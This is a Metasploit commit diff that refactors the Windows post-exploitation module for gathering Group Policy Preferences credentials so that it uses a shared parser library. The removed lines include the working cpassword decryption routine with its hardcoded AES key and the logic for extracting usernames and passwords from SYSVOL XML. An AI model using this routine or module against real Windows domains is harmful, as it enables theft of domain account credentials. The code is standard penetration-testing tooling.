Use parser

Meatballs1 · Meatballs1 · commit 92669cd4d615 · 2014-05-20T22:26:13.000+01:00
diff --git a/lib/rex/parser/group_policy_preferences.rb b/lib/rex/parser/group_policy_preferences.rb
@@ -61,8 +61,8 @@ def self.parse(data)
       }
 
       result.merge!({ :EXPIRES => expires }) unless expires.nil? || expires.empty?
-      result.merge!({ :NEVER_EXPIRE => never_expires }) unless never_expires.nil? || never_expires.empty?
-      result.merge!({ :DISABLED => disabled }) unless disabled.nil? || disabled.empty?
+      result.merge!({ :NEVER_EXPIRES => never_expires.to_i }) unless never_expires.nil? || never_expires.empty?
+      result.merge!({ :DISABLED => disabled.to_i }) unless disabled.nil? || disabled.empty?
       result.merge!({ :PATH => path }) unless path.nil? || path.empty?
       result.merge!({ :DATASOURCE => dsn }) unless dsn.nil? || dsn.empty?
       result.merge!({ :DRIVER => driver }) unless driver.nil? || driver.empty?
@@ -106,8 +106,8 @@ def self.create_tables(results, filetype, domain=nil, dc=nil)
       table << ["DOMAIN", domain] unless domain.nil? || domain.empty?
       table << ["CHANGED", result[:CHANGED]]
       table << ["EXPIRES", result[:EXPIRES]] unless result[:EXPIRES].nil? || result[:EXPIRES].empty?
-      table << ["NEVER_EXPIRES?", result[:NEVER_EXPIRE]] unless result[:NEVER_EXPIRE].nil? || result[:NEVER_EXPIRE].empty?
-      table << ["DISABLED", result[:DISABLED]] unless result[:DISABLED].nil? || result[:DISABLED].empty?
+      table << ["NEVER_EXPIRES?", result[:NEVER_EXPIRES]] unless result[:NEVER_EXPIRES].nil?
+      table << ["DISABLED", result[:DISABLED]] unless result[:DISABLED].nil?
       table << ["PATH", result[:PATH]] unless result[:PATH].nil? || result[:PATH].empty?
       table << ["DATASOURCE", result[:DSN]] unless result[:DSN].nil? || result[:DSN].empty?
       table << ["DRIVER", result[:DRIVER]] unless result[:DRIVER].nil? || result[:DRIVER].empty?
diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb
@@ -4,9 +4,8 @@
 ##
 
 require 'msf/core'
-require 'rex'
-require 'rexml/document'
 require 'msf/core/auxiliary/report'
+require 'rex/parser/group_policy_preferences'
 
 class Metasploit3 < Msf::Post
   include Msf::Auxiliary::Report
@@ -220,7 +219,7 @@ def gpp_xml_file(path)
       retobj = {
         :dc     => spath[2],
         :path   => path,
-        :xml    => REXML::Document.new(data).root
+        :xml    => data
       }
       if spath[4] == "sysvol"
         retobj[:domain] = spath[5]
@@ -237,85 +236,34 @@ def gpp_xml_file(path)
   def parse_xml(xmlfile)
     mxml = xmlfile[:xml]
     print_status "Parsing file: #{xmlfile[:path]} ..."
-    filetype = xmlfile[:path].split('\\').last()
-    mxml.elements.to_a("//Properties").each do |node|
-      epassword = node.attributes['cpassword']
-      next if epassword.to_s.empty?
-      pass = decrypt(epassword)
-
-      user = node.attributes['runAs'] if node.attributes['runAs']
-      user = node.attributes['accountName'] if node.attributes['accountName']
-      user = node.attributes['username'] if node.attributes['username']
-      user = node.attributes['userName'] if node.attributes['userName']
-      user = node.attributes['newName'] unless node.attributes['newName'].blank?
-      changed = node.parent.attributes['changed']
-
-      # Printers and Shares
-      path = node.attributes['path']
-
-      # Datasources
-      dsn = node.attributes['dsn']
-      driver = node.attributes['driver']
-
-      # Tasks
-      app_name = node.attributes['appName']
-
-      # Services
-      service = node.attributes['serviceName']
-
-      # Groups
-      expires = node.attributes['expires']
-      never_expires = node.attributes['neverExpires']
-      disabled = node.attributes['acctDisabled']
-
-      table = Rex::Ui::Text::Table.new(
-        'Header'     => 'Group Policy Credential Info',
-        'Indent'     => 1,
-        'SortIndex'  => -1,
-        'Columns'    =>
-        [
-          'Name',
-          'Value',
-        ]
-      )
-
-      table << ["TYPE", filetype]
-      table << ["USERNAME", user]
-      table << ["PASSWORD", pass]
-      table << ["DOMAIN CONTROLLER", xmlfile[:dc]]
-      table << ["DOMAIN", xmlfile[:domain] ]
-      table << ["CHANGED", changed]
-      table << ["EXPIRES", expires] unless expires.blank?
-      table << ["NEVER_EXPIRES?", never_expires] unless never_expires.blank?
-      table << ["DISABLED", disabled] unless disabled.blank?
-      table << ["PATH", path] unless path.blank?
-      table << ["DATASOURCE", dsn] unless dsn.blank?
-      table << ["DRIVER", driver] unless driver.blank?
-      table << ["TASK", app_name] unless app_name.blank?
-      table << ["SERVICE", service] unless service.blank?
-
-      node.elements.each('//Attributes//Attribute') do |dsn_attribute|
-        table << ["ATTRIBUTE", "#{dsn_attribute.attributes['name']} - #{dsn_attribute.attributes['value']}"]
-      end
+    filetype = File.basename(xmlfile[:path].gsub("\\","/"))
+    results = Rex::Parser::GPP.parse(mxml)
 
-      print_good table.to_s
+    tables = Rex::Parser::GPP.create_tables(results, filetype, xmlfile[:domain], xmlfile[:dc])
 
+    tables.each do |table|
+      table.print
+    end
+
+    results.each do |result|
       if datastore['STORE']
         stored_path = store_loot('windows.gpp.xml', 'text/plain', session, xmlfile[:xml], filetype, xmlfile[:path])
         print_status("XML file saved to: #{stored_path}")
       end
 
-      report_creds(user,pass) unless disabled and disabled == '1'
+      report_creds(result[:USER], result[:PASS], result[:DISABLED])
     end
   end
 
-  def report_creds(user, pass)
+  def report_creds(user, password, disabled)
     if session.db_record
       source_id = session.db_record.id
     else
       source_id = nil
     end
 
+    active = (disabled == 0)
+
     report_auth_info(
       :host  => session.sock.peerhost,
       :port => 445,
@@ -324,23 +272,8 @@ def report_creds(user, pass)
       :source_id => source_id,
       :source_type => "exploit",
       :user => user,
-      :pass => pass)
-  end
-
-  def decrypt(encrypted_data)
-    padding = "=" * (4 - (encrypted_data.length % 4))
-    epassword = "#{encrypted_data}#{padding}"
-    decoded = Rex::Text.decode_base64(epassword)
-
-    key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
-    aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
-    aes.decrypt
-    aes.key = key
-    plaintext = aes.update(decoded)
-    plaintext << aes.final
-    pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion
-
-    return pass
+      :pass => password,
+      :active => active)
   end
 
   def enum_domains
